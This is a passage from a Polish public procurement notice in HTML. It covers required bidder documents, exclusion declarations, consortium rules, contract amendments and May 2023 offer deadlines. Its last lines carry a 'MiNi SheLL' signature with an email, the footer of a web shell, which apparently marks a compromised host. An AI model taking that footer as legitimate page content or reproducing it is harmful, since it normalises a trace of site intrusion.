kapitałowej;<br/>2)	dokument/dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego w Rozdziale XV pkt 4. W przypadku składania oferty wspólnej oświadczenie składa wykonawca, który będzie odpowiadał za spełnienie ww. warunku.<br/> <br/>Uwaga: Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej<br/>3)	Wykaz zrealizowanych usług, o których mowa w rozdziale XV pkt 5 ppkt 1-4 SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie. <br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>4)	Wykaz osób, o których mowa w rozdziale XV pkt 6 ppkt 1-4, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania określonych w:<br/>a)	art. 108 ust. 1 pkt 3 ustawy,<br/>b)	art. 108 ust. 1 pkt 4 ustawy odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5 ustawy odnośnie do zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 ustawy,<br/>e)	art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3.	Dokumenty składane wraz z Formularzem Ofertowym: <br/>1)	Oświadczenie stanowiące dowód potwierdzający na dzień składania ofert brak podstaw wykluczenia oraz spełnianie warunków udziału w postepowaniu, tymczasowo zastępujące podmiotowe środki dowodowe – zgodnie z załącznikiem nr 2 do SWZ<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie składa każdy <br/>z Wykonawców. W przypadku korzystania z zasobów innego podmiotu w celu wykazania spełniania warunku udziału w postępowaniu Wykonawca składa oświadczenie podmiotu udostępniającego zasoby (potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby). <br/><br/>2)	Dokument, z którego wynika zakres umocowania do działania w imieniu Wykonawcy <br/>w postępowaniu o udzielenie zamówienia:<br/>a)	Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru.<br/>UWAGA: Wykonawca nie jest zobowiązany do złożenia dokumentu, jeżeli dokument Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>b)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów, o których mowa w lit. a.<br/>Dokument musi zostać złożony pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym. Dopuszczalne jest również złożenie kopii dokumentu elektronicznie poświadczonej przez notariusza.<br/>UWAGA: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zasady określone w lit. b stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3)	Zobowiązanie podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (jeżeli dotyczy) – wzór stanowi załącznik nr 5 do SWZ.<br/>4)	Oświadczenie stanowiące dowód potwierdzający na dzień składania ofert brak podstaw wykluczenia na podstawie art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) – oświadczenie stanowi załącznik nr 2 do SWZ.<br/>5)	Oświadczenie składane w celu przyznania punktów w kryteriach oceny ofert, według wzoru stanowiącego załącznik nr 6 do swz. W przypadku składania oferty wspólnej należy złożyć jedno wspólne oświadczenie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.<br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. Oświadczenie jw. przedkłada się, w przypadku określonym w art. 117 ust. 2 i 3 Ustawy, zgodnie z treścią Formularza ofertowego. <br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich zastosowanie zasady określone w pkt 1 – 4.<br/>6.	Przed podpisaniem umowy (w przypadku wyboru danej oferty jako najkorzystniejszej) wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum, zawierającą co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia;<br/>2)	określenie zakresu działania poszczególnych stron umowy;<br/>3)	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści niniejszej Umowy wymagają formy pisemnej pod rygorem<br/>nieważności.<br/>2. Zmiany zostaną wprowadzone aneksem do<br/>niniejszej Umowy i będą skuteczne od daty zawarcia tego aneksu.<br/>Z uwagi na limit znaków szczegółowe informacje zawarte są w załączniku nr 4 do SWZ - we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://portal.smartpzp.pl/sim</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com